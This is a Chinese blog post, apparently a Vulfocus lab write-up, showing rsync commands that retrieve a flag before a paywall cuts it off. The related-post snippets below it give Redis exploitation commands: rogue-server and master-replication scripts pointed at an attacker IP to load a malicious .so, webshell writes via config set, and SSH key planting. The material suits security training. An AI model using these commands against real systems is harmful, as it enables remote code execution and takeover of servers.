未授权漏洞vulfocu靶场实战

原创

已于 2024-05-13 15:18:57 修改 · 7.4k 阅读

8 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #linux #redis

于 2022-03-03 15:51:57 首次发布

本文介绍了如何利用rsync未授权访问漏洞和Redis未授权漏洞来获取目标系统的flag。首先，通过rsync命令连接到目标IP并进入指定目录获取flag。接着，详细阐述了Redis未授权漏洞的利用过程，包括编译模块、复制文件、安装必要软件及运行python脚本来远程执行命令，最终获取到flag。整个过程展示了网络安全中常见的漏洞利用技术。

rsync未授权漏洞

打开会有一个输入flag的文本框，所以我们需要查找flag如图

把网站的ip信息收集到如图

在kali终端进入 (root💀kali)-[~/vulhub/rsync]目录下输入

rsync rsync://123.58.236.76 :19358/src/

上面也说了flag在tmp目录下所以输入

rsync rsync://123.58.236.76:19358/src/tmp/

可以查到flag 如图

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

beichenyyds

关注关注

1
点赞
踩
8

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

VulnHub--DC-1--flag

记录笔记

04-08

388

配置网络为nat模式（你需要知道你的靶机的IP网段，最好与kali攻击机处于同一网段）查看net模式下的网段 192.168.15.0 我们查看一下kali的IP地址 kali的IP192.168.15.142 Nmap -Sp 192.168.15.0/24扫描存活主机我们就的到了DC-1的ip192.168.15.143 我们扫描一下看下开放的端口目标靶机开放ssh远程连接服务，HTTP服务 whatweb http://192.168.15.143扫描网站指纹信息或者使用火狐所带的

VULFOCUS靶场CVE-2020-5504漏洞复现拿flag

u013345705的博客

07-18

3065

VULFOCUS CVE-2020-5504

1 条评论您还未登录，请先登录后发表或查看评论

两种Vulfocus靶场部署方案

最新发布

佛系跟新......的博客

09-28

268

两种Vulfocus靶场部署方案

vulfocus靶场入门

七堇年的博客

02-22

6365

vulfocus靶场入门

vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557

没有故事

04-18

1788

python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP。>" #向文件中写入内容。config set dbfilename 1.php #写入文件。主从复制getshell，写入恶意的so文件达到执行系统命令的目的。config set dir /tmp #创建临时目录。利用条件：需要web目录有读写权限，只有读权限会失败。证明web目录具有写权限，可以进行利用。

VULFOCUS-redis未授权访问（CNVD-2019-21763 ）

HAKUNAMATATATTA的博客

11-30

3695

redis未授权访问，主从复制RCE

【靶场实战】vulntarget-b漏洞靶场实战

TT小子的博客

06-20

2297

vulntarget-b漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场，其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。

【靶场实战】vulntarget-a漏洞靶场实战

TT小子的博客

06-20

1632

vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场，其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。

redis未授权访问漏洞【vulhub靶场】复现

m0_55854679的博客

08-01

1687

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上；如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的config 命令，可以进行写文件操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹

PHP漏洞挖掘（四）：PHP漏洞靶场实战分析——课程资源百度网盘下载.txt

05-06

PHP漏洞挖掘（四）：PHP漏洞靶场实战分析——课程资源百度网盘下载，，亲测真实有效可用！包含视频+课程资料.zip，在知识星球中也分享了该资源，知识星球：W小哥

什么是未授权访问漏洞？Hadoop & Redis靶场实战——Vulfocus服务攻防

xt350488的博客

06-30

1406

Vulfocus是一个便捷的漏洞集成平台，用户只需加载漏洞环境的Docker镜像即可快速使用。它具备一键启动、自动更新flag、计分考核等特性，适用于安全测试和能力评估。平台兼容Vulhub和Vulapps的镜像，支持可视化配置，是安全人员的理想工具。在线位置：https://vulfocus.cn/#/dashboard离线版本：https://github.com/fofapro/vulfocus （即使没有网络也可以在本地进行渗透测试）Tips：docker 部署过程需要科学上网。

vulfocus漏洞学习——redis 未授权访问（CNVD-2015-07557）

2401_88083440的博客

05-19

622

Redis 是一个免费开源的键值存储数据库，数据默认存到内存中，用简单的 C 语言编写，能通过网络访问。该漏洞的成因是：在默认情况下，Redis会绑定到 0.0.0.0:6379，这意味着Redis会直接暴露到公网上，而此时如果又没有设置密码认证，会导致任意用户在可以访问到目标服务器的情况下未授权访问Redis并读取Redis的数据，还可以利用Redis提供的命令将自己的ssh公钥写入目标服务器，从而导致可以直接进行ssh登录目标服务器。

burp靶场-未授权

m0_63017297的博客

04-18

444

直接对目录进行扫描，扫到rebots.txt文件，里面有个url访问即可删除用户。漏洞：未授权访问。

Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)

weixin_74985952的博客

09-22

1550

由于在Reids 4.x及以上版本中新增了模块功能，攻击者可通过外部拓展，在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块，在未授权访问的情况下使被攻击服务器加载恶意.so 文件，从而实现远程代码执行。对于Redis服务的未授权访问，首先需要确认Redis未授权是否存在，使用Redis数据库客户端进行连接测试，如何没有密码，即未授权漏洞存在。漏洞利用有三种利用方式，每种方式都有限制条件，本质就是使用Redis数据库操作语句在目标主机进行写入文件。注意：部分没目录权限读写权限。

redis未授权访问(cnvd_2019_21763)

qq_14902381的博客

08-12

2630

redis未授权访问漏洞，(cnvd_2019_21763)

redis 未授权访问 (CNVD-2019-21763)

qq_32445755的博客

10-03

1214

近日，Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞，攻击者通过构造特定的请求实现漏洞利用，成功利用漏洞可在目标服务器上实现Getshell，风险较高。目前漏洞的利用方式已被公开。CNVD-2015-07557也可以复现。

【漏洞复现】redis未授权访问

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

08-16

1453

Redis服务在一台服务器上可以同时启动多个Redis进程，Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程，当多个客户端同时访问时，服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中，需要根据实际的需求来决定开启多少个Redis进程。Redis（Remote Dictionary Server )，即远程字典服务，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。....

ssrf+redis未授权靶场

actistsec的博客

10-25

2324

自己搭建不太合理的ssrf联动redis未授权

cnvd_2015_07557-redis未授权访问rce漏洞复现-vulfocus复现

c0529的博客

06-10

1617

python3 redis-master.py -r 目的ip -p 目的端口 -L 47.100.167.248 -P 1111 -f RedisModulesSDK/exp.so -c "id"python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c "id"出了一个file，搜了一下是由于这个文件用python3写的，要检查一下你的服务器上是不是python版本3.0以上，用。

未授权访问漏洞靶场

04-01

好的，我现在需要帮助用户寻找关于未授权访问漏洞的靶场和学习资源。首先，我得回顾用户提供的引用内容，看看里面有没有相关的信息。用户提到了引用1到5，其中引用2、3、4、5都提到了靶场或者相关漏洞的实战内容。...